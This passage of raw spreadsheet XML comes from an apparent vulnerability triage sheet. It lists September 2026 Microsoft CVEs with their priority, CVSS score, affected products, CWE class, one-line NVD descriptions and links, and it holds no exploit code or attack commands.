Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t></is></c></row><row r="149"><c r="A149" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C149" s="5" t="inlineStr"><is><t>CVE-2026-69495</t></is></c><c r="D149" s="5" t="n"><v>8.800000000000001</v></c><c r="E149" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F149" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G149" s="5" t="inlineStr" /><c r="H149" s="5" t="n"><v>0.008</v></c><c r="I149" s="5" t="inlineStr" /><c r="J149" s="5" t="inlineStr" /><c r="K149" s="5" t="inlineStr" /><c r="L149" s="5" t="inlineStr" /><c r="M149" s="5" t="inlineStr" /><c r="N149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P149" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q149" s="5" t="inlineStr" /><c r="R149" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S149" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t></is></c></row><row r="150"><c r="A150" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B150" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C150" s="5" t="inlineStr"><is><t>CVE-2026-69499</t></is></c><c r="D150" s="5" t="n"><v>8.800000000000001</v></c><c r="E150" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F150" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G150" s="5" t="inlineStr" /><c r="H150" s="5" t="n"><v>0.008</v></c><c r="I150" s="5" t="inlineStr" /><c r="J150" s="5" t="inlineStr" /><c r="K150" s="5" t="inlineStr" /><c r="L150" s="5" t="inlineStr" /><c r="M150" s="5" t="inlineStr" /><c r="N150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O150" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P150" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q150" s="5" t="inlineStr" /><c r="R150" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S150" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t></is></c></row><row r="151"><c r="A151" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B151" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C151" s="5" t="inlineStr"><is><t>CVE-2026-69511</t></is></c><c r="D151" s="5" t="n"><v>8.800000000000001</v></c><c r="E151" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F151" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G151" s="5" t="inlineStr" /><c r="H151" s="5" t="n"><v>0.008</v></c><c r="I151" s="5" t="inlineStr" /><c r="J151" s="5" t="inlineStr" /><c r="K151" s="5" t="inlineStr" /><c r="L151" s="5" t="inlineStr" /><c r="M151" s="5" t="inlineStr" /><c r="N151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O151" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P151" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q151" s="5" t="inlineStr" /><c r="R151" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S151" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t></is></c></row><row r="152"><c r="A152" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C152" s="5" t="inlineStr"><is><t>CVE-2026-69518</t></is></c><c r="D152" s="5" t="n"><v>8.800000000000001</v></c><c r="E152" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F152" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G152" s="5" t="inlineStr" /><c r="H152" s="5" t="n"><v>0.008</v></c><c r="I152" s="5" t="inlineStr" /><c r="J152" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K15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2" s="5" t="inlineStr" /><c r="M152" s="5" t="inlineStr" /><c r="N152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P152" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q152" s="5" t="inlineStr" /><c r="R152" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S152" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t></is></c></row><row r="153"><c r="A153" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B153" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C153" s="5" t="inlineStr"><is><t>CVE-2026-69522</t></is></c><c r="D153" s="5" t="n"><v>8.800000000000001</v></c><c r="E153" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F153" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G153" s="5" t="inlineStr" /><c r="H153" s="5" t="n"><v>0.008</v></c><c r="I153" s="5" t="inlineStr" /><c r="J153" s="5" t="inlineStr" /><c r="K153" s="5" t="inlineStr" /><c r="L153" s="5" t="inlineStr" /><c r="M153" s="5" t="inlineStr" /><c r="N153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P153" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q153" s="5" t="inlineStr" /><c r="R153" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S153" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t></is></c></row><row r="154"><c r="A154" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B154" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C154" s="5" t="inlineStr"><is><t>CVE-2026-69529</t></is></c><c r="D154" s="5" t="n"><v>8.800000000000001</v></c><c r="E154" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F154" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G154" s="5" t="inlineStr" /><c r="H154" s="5" t="n"><v>0.005</v></c><c r="I154" s="5" t="inlineStr" /><c r="J154" s="5" t="inlineStr" /><c r="K154" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L154" s="5" t="inlineStr" /><c r="M154" s="5" t="inlineStr" /><c r="N154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O154" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P154" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q154" s="5" t="inlineStr" /><c r="R154" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S154" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t></is></c></row><row r="155"><c r="A155" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B155" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C155" s="5" t="inlineStr"><is><t>CVE-2026-69547</t></is></c><c r="D155" s="5" t="n"><v>8.800000000000001</v></c><c r="E155" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F155" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G155" s="5" t="inlineStr" /><c r="H155" s="5" t="n"><v>0.008999999999999999</v></c><c r="I155" s="5" t="inlineStr" /><c r="J155" s="5" t="inlineStr" /><c r="K155" s="5" t="inlineStr" /><c r="L155" s="5" t="inlineStr" /><c r="M155" s="5" t="inlineStr" /><c r="N155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O155" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P155" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q155" s="5" t="inlineStr" /><c r="R155" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S155" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t></is></c></row><row r="156"><c r="A156" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C156" s="5" t="inlineStr"><is><t>CVE-2026-69551</t></is></c><c r="D156" s="5" t="n"><v>8.800000000000001</v></c><c r="E156" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F156" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G156" s="5" t="inlineStr" /><c r="H156" s="5" t="n"><v>0.008999999999999999</v></c><c r="I156" s="5" t="inlineStr" /><c r="J156" s="5" t="inlineStr" /><c r="K156" s="5" t="inlineStr" /><c r="L156" s="5" t="inlineStr" /><c r="M156" s="5" t="inlineStr" /><c r="N156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P156" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q156" s="5" t="inlineStr" /><c r="R156" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S156" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="T156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t></is></c></row><row r="157"><c r="A157" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B157" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C157" s="5" t="inlineStr"><is><t>CVE-2026-69556</t></is></c><c r="D157" s="5" t="n"><v>8.800000000000001</v></c><c r="E157" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F157" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G157" s="5" t="inlineStr" /><c r="H157" s="5" t="n"><v>0.008</v></c><c r="I157" s="5" t="inlineStr" /><c r="J157" s="5" t="inlineStr" /><c r="K157" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L157" s="5" t="inlineStr" /><c r="M157" s="5" t="inlineStr" /><c r="N157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P157" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q157" s="5" t="inlineStr" /><c r="R157" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S157" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t></is></c></row><row r="158"><c r="A158" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C158" s="5" t="inlineStr"><is><t>CVE-2026-69598</t></is></c><c r="D158" s="5" t="n"><v>8.800000000000001</v></c><c r="E158" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F158" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G158" s="5" t="inlineStr" /><c r="H158" s="5" t="n"><v>0.008</v></c><c r="I158" s="5" t="inlineStr" /><c r="J158" s="5" t="inlineStr" /><c r="K158" s="5" t="inlineStr" /><c r="L158" s="5" t="inlineStr" /><c r="M158" s="5" t="inlineStr" /><c r="N158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P158" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q158" s="5" t="inlineStr" /><c r="R158" s="5" t="inlineStr"><is><t>CWE-131</t></is></c><c r="S158" s="5" t="inlineStr"><is><t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t></is></c></row><row r="159"><c r="A159" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C159" s="5" t="inlineStr"><is><t>CVE-2026-69601</t></is></c><c r="D159" s="5" t="n"><v>8.800000000000001</v></c><c r="E159" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F159" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G159" s="5" t="inlineStr" /><c r="H159" s="5" t="n"><v>0.008</v></c><c r="I159" s="5" t="inlineStr" /><c r="J159" s="5" t="inlineStr" /><c r="K159" s="5" t="inlineStr" /><c r="L159" s="5" t="inlineStr" /><c r="M159" s="5" t="inlineStr" /><c r="N159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P159" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q159" s="5" t="inlineStr" /><c r="R159" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S159" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t></is></c></row><row r="160"><c r="A160" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C160" s="5" t="inlineStr"><is><t>CVE-2026-69603</t></is></c><c r="D160" s="5" t="n"><v>8.800000000000001</v></c><c r="E160" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F160" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G160" s="5" t="inlineStr" /><c r="H160" s="5" t="n"><v>0.003</v></c><c r="I160" s="5" t="inlineStr" /><c r="J160" s="5" t="inlineStr" /><c r="K160" s="5" t="inlineStr" /><c r="L160" s="5" t="inlineStr" /><c r="M160" s="5" t="inlineStr" /><c r="N160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P160" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q160" s="5" t="inlineStr" /><c r="R160" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S160" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="T160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t></is></c></row><row r="161"><c r="A161" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C161" s="5" t="inlineStr"><is><t>CVE-2026-69614</t></is></c><c r="D161" s="5" t="n"><v>8.800000000000001</v></c><c r="E161" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F161" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G161" s="5" t="inlineStr" /><c r="H161" s="5" t="n"><v>0.008999999999999999</v></c><c r="I161" s="5" t="inlineStr" /><c r="J161" s="5" t="inlineStr" /><c r="K161" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L161" s="5" t="inlineStr" /><c r="M161" s="5" t="inlineStr" /><c r="N161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P161" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q161" s="5" t="inlineStr" /><c r="R161" s="5" t="inlineStr"><is><t>CWE-121, CWE-20</t></is></c><c r="S161" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t></is></c></row><row r="162"><c r="A162" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C162" s="5" t="inlineStr"><is><t>CVE-2026-69628</t></is></c><c r="D162" s="5" t="n"><v>8.800000000000001</v></c><c r="E162" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F162" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G162" s="5" t="inlineStr" /><c r="H162" s="5" t="n"><v>0.008999999999999999</v></c><c r="I162" s="5" t="inlineStr" /><c r="J162" s="5" t="inlineStr" /><c r="K162" s="5" t="inlineStr" /><c r="L162" s="5" t="inlineStr" /><c r="M162" s="5" t="inlineStr" /><c r="N162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P162" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q162" s="5" t="inlineStr" /><c r="R162" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S162" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t></is></c><c r="T162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t></is></c></row><row r="163"><c r="A163" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B163" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C163" s="5" t="inlineStr"><is><t>CVE-2026-69629</t></is></c><c r="D163" s="5" t="n"><v>8.800000000000001</v></c><c r="E163" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F163" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G163" s="5" t="inlineStr" /><c r="H163" s="5" t="n"><v>0.008</v></c><c r="I163" s="5" t="inlineStr" /><c r="J163" s="5" t="inlineStr" /><c r="K163" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L163" s="5" t="inlineStr" /><c r="M163" s="5" t="inlineStr" /><c r="N163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O163" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P163" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q163" s="5" t="inlineStr" /><c r="R163" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S163" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t></is></c></row><row r="164"><c r="A164" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C164" s="5" t="inlineStr"><is><t>CVE-2026-69632</t></is></c><c r="D164" s="5" t="n"><v>8.800000000000001</v></c><c r="E164" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F164" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G164" s="5" t="inlineStr" /><c r="H164" s="5" t="n"><v>0.008</v></c><c r="I164" s="5" t="inlineStr" /><c r="J164" s="5" t="inlineStr" /><c r="K164" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L164" s="5" t="inlineStr" /><c r="M164" s="5" t="inlineStr" /><c r="N164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P164" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q164" s="5" t="inlineStr" /><c r="R164" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S164" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t></is></c></row><row r="165"><c r="A165" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C165" s="5" t="inlineStr"><is><t>CVE-2026-69649</t></is></c><c r="D165" s="5" t="n"><v>8.800000000000001</v></c><c r="E165" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F165" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G165" s="5" t="inlineStr" /><c r="H165" s="5" t="n"><v>0.008</v></c><c r="I165" s="5" t="inlineStr" /><c r="J165" s="5" t="inlineStr" /><c r="K165" s="5" t="inlineStr" /><c r="L165" s="5" t="inlineStr" /><c r="M165" s="5" t="inlineStr" /><c r="N165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P165" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q165" s="5" t="inlineStr" /><c r="R165" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S165" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t></is></c></row><row r="166"><c r="A166" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B166" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C166" s="5" t="inlineStr"><is><t>CVE-2026-69669</t></is></c><c r="D166" s="5" t="n"><v>8.800000000000001</v></c><c r="E166" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F166" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G166" s="5" t="inlineStr" /><c r="H166" s="5" t="n"><v>0.008</v></c><c r="I166" s="5" t="inlineStr" /><c r="J166" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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66" s="5" t="inlineStr" /><c r="M166" s="5" t="inlineStr" /><c r="N166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P166" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q166" s="5" t="inlineStr" /><c r="R166" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S166" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t></is></c></row><row r="167"><c r="A167" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B167" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C167" s="5" t="inlineStr"><is><t>CVE-2026-69671</t></is></c><c r="D167" s="5" t="n"><v>8.800000000000001</v></c><c r="E167" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F167" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G167" s="5" t="inlineStr" /><c r="H167" s="5" t="n"><v>0.008</v></c><c r="I167" s="5" t="inlineStr" /><c r="J167" s="5" t="inlineStr" /><c r="K167" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L167" s="5" t="inlineStr" /><c r="M167" s="5" t="inlineStr" /><c r="N167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O167" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P167" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q167" s="5" t="inlineStr" /><c r="R167" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S167" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t></is></c></row><row r="168"><c r="A168" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B168" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C168" s="5" t="inlineStr"><is><t>CVE-2026-69676</t></is></c><c r="D168" s="5" t="n"><v>8.800000000000001</v></c><c r="E168" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F168" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G168" s="5" t="inlineStr" /><c r="H168" s="5" t="n"><v>0.012</v></c><c r="I168" s="5" t="inlineStr" /><c r="J168" s="5" t="inlineStr" /><c r="K168" s="5" t="inlineStr" /><c r="L168" s="5" t="inlineStr" /><c r="M168" s="5" t="inlineStr" /><c r="N168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P168" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q168" s="5" t="inlineStr" /><c r="R168" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S168" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t></is></c><c r="T168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t></is></c></row><row r="169"><c r="A169" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C169" s="5" t="inlineStr"><is><t>CVE-2026-69678</t></is></c><c r="D169" s="5" t="n"><v>8.800000000000001</v></c><c r="E169" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F169" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G169" s="5" t="inlineStr" /><c r="H169" s="5" t="n"><v>0.008</v></c><c r="I169" s="5" t="inlineStr" /><c r="J169" s="5" t="inlineStr" /><c r="K169" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L169" s="5" t="inlineStr" /><c r="M169" s="5" t="inlineStr" /><c r="N169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P169" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q169" s="5" t="inlineStr" /><c r="R169" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S169" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t></is></c></row><row r="170"><c r="A170" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C170" s="5" t="inlineStr"><is><t>CVE-2026-69686</t></is></c><c r="D170" s="5" t="n"><v>8.800000000000001</v></c><c r="E170" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F170" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G170" s="5" t="inlineStr" /><c r="H170" s="5" t="n"><v>0.008</v></c><c r="I170" s="5" t="inlineStr" /><c r="J170" s="5" t="inlineStr" /><c r="K170" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L170" s="5" t="inlineStr" /><c r="M170" s="5" t="inlineStr" /><c r="N170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P170" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q170" s="5" t="inlineStr" /><c r="R170" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S170" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t></is></c></row><row r="171"><c r="A171" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B171" s="5" 